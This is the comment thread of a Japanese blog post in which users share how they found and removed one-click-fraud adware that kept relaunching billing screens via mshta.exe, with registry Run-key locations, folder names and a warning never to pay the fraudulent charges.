HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
値の名前(N): webnxspm
値のデータ(V): "C:Documents and Settings/All Users/Application Data/nxspm/70672703"

[ 2014/03/29 00:35 ] -の訂正用

Vistaでは、
→HKEY_CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
値の名前(N): ********

修正しました

[ 2014/03/28 01:24 ] [ 編集 ]

Re: ＞nxspmというフォルダー

> は、去年の話でしょうか？
pochiさんに聞かないとわかりませんが、最近の話のようですね。
去年から出回っていたのですね。

pochiさんの現象を解説いただき、ありがとうございます(^^)

[ 2014/03/28 03:02 ] [ 編集 ]

Re: ＞nxspmというフォルダー

昨年のことか一昨年のことです。夜中に酔っていろいろなサイトを開いていたらこんなことになってしまい恥ずかしい限りです。当時、このサイトを見つけ、朝までになんとか解決しました。ありがとうございました。
閉じても勝手に一定時間ごとに開くので、LANケーブルを外して再起動しましたが、やはり起動すると開くので、ソフトがPC内部にインストールされたと分かりました。私はPCに詳しくないのですが、再起動して何もしないのに開くということは、起動時にスタートするプログラムに指定されているということだと思い、ネットで起動時にスタートするプログラムの一覧を出す方法と削除の方法を調べて解決しました。再起動時にスタートさえしなければ、後はあせらずにゆっくり犯人を割り出して削除すればいいわけです。同時に、その日にインストールないしダウンロードしたファイルを調べる方法も使い特定したような気がします。だいぶ以前のことですが、当時のメモが残っていたので、犯人のホルダーの場所と名前が残っていたので、記載させていただきました。請求会社の名称そのものか略称がNXだった記憶で、NXのスパムファイルとはふざけた名前のホルダー、ファイルだと印象に残っていたのです。水着のお姉ちゃんのJPEG?ファイルは記念に残しておいてもよかったかもしれません（笑）

[ 2014/03/29 08:17 ] [ 編集 ]

追伸

当時のメモが出てきて、当時のことを思い出し、まだ被害が発生しているようなので書き込みしました。当時はここの書き込みが１年ほど納まっていたので、もう過去のこことになっているのかと思い、書き込みはしませんでした。
　当時、こちらの方法に従い、mshta hta　を削除したのですが、いつの間にかまた再生されているのです。再起動するとか、一定時間が経つとかは、たぶん後者だったような気がしますが、どうも新種の奴だったので、mshta htaの削除だけではだめだったようです。今思い出したのですが、２つのフォルダーを削除したような記憶があるので、実行ファイルがあるフォルダーとそれとな全然別な場所に、mshta htaを再生させるフォルダーが格納されていたのではないでしょうか？
　請求額は３万だか７万だったかの記憶ですが、会社のPCモニターだった場合は会社にばれるとまずいという気持ちから、これぐらいだったら支払ってもいいかと思い、相手先に連絡して支払ってしまう人もいますが、それをすると大変なことになります。恥ずかしながら、私は法律の仕事をしているので実際に目にしているのですが、ワンクリック詐欺に限らず不正請求（というかすべての詐欺は）は、すべて３万円程度から始まり、ひっかかった人間（カモ）から取れるこことまで絞り取ろうとするので、数百万円まで行く事例はざらにあります。絶対に支払ってはならないし、支払ったら自分の身元が亜相手にばれるので、さらに被害が拡大してしまいますよ！

[ 2014/03/29 08:46 ] [ 編集 ]

pochiさんへ

やはり、以前の話だったのですね。

体験談および法律関係者としてのお話ありがとうございます。
絶対に払ってはならない、というのは鉄則ですね

[ 2014/03/29 13:42 ] [ 編集 ]

こちらのレジストリキーはmsconfig.exeでチェックを外したものだと思いますよ
HKLM\SOFTWARE\Microsoft\SharedTools\MSConfig

[ 2014/04/30 06:34 ] [ 編集 ]

投稿ありがとうございます。
途中のコメントでも議論されていますが、
スタートアップの項目からもなくしたい、という方もいらっしゃるので、
そういう方は削除するといいかもしれませんね。
ただ、ご指摘のとおりです。
記事のほうには括弧でもつけておきましょうか(^^;

[ 2014/04/30 14:07 ] [ 編集 ]

怪しい日付で日付指定した所、やたらと大きなファイルがあったので、それを削除したら完治しました。
怪しい部分をあらかた調べていたのですが、どうしても消えなかったのです。
いままで色々なサイトを巡って様々な方法を試しましたが、このサイトが決め手でした。

[ 2014/05/01 09:03 ] [ 編集 ]

嬉しいコメントです。
続けて良かったヽ(‘ ∇‘ )ノ

[ 2014/05/02 01:30 ] [ 編集 ]

コメントについて

いつもコメントありがとうございます。
コメントを参照したり、引用したりするのに役に立ちますので、
コメントの際は、投稿名をお願いいたします。

また、同じ方が投稿してくださったのかどうかもわかります。
こちらから質問したいこともあります。
よろしくお願いいたします。

[ 2014/05/07 03:07 ] [ 編集 ]

横浜の義父より電話があり、遠隔操作で探してましたが
タスクマネージャでmshta.exeが動いてるのは確認できるんですが
レジストリーを検索しても　どこ探しても見つかりませんでした

上記記事で

windows7です。
ワンクリ詐欺ツールの本体は
C:\ProgramData\・・・

というのを見てC:\ProgramData\を見てみたら

SGAMEというフォルダがそうでした。
フォルダの作成日と
中にでてくる画像と同じJPGがあり
それで判断できました。

レジストラーで　sgameを検索したらヒット
sgameフォルダ内のBATファイルを指定してました。

BATファイルをみると　同フォルダの～.hを指定してて
その中で同フォルダ内の　拡張子なしの中身がスクリプトを呼び出していて、

その中身に表示されてる文字やmshta.exeの呼び出しがありました。

sgameフォルダをデスクトップに移動させるとmshta.exeの無限復活が無くなりました。

レジストリからもsgameの記述の一行を削除して　sgameもフォルダごと削除して作業終了となりました。

このサイトが無ければわからないところでした
ありがとうございました

[ 2015/03/19 22:28 ] [ 編集 ]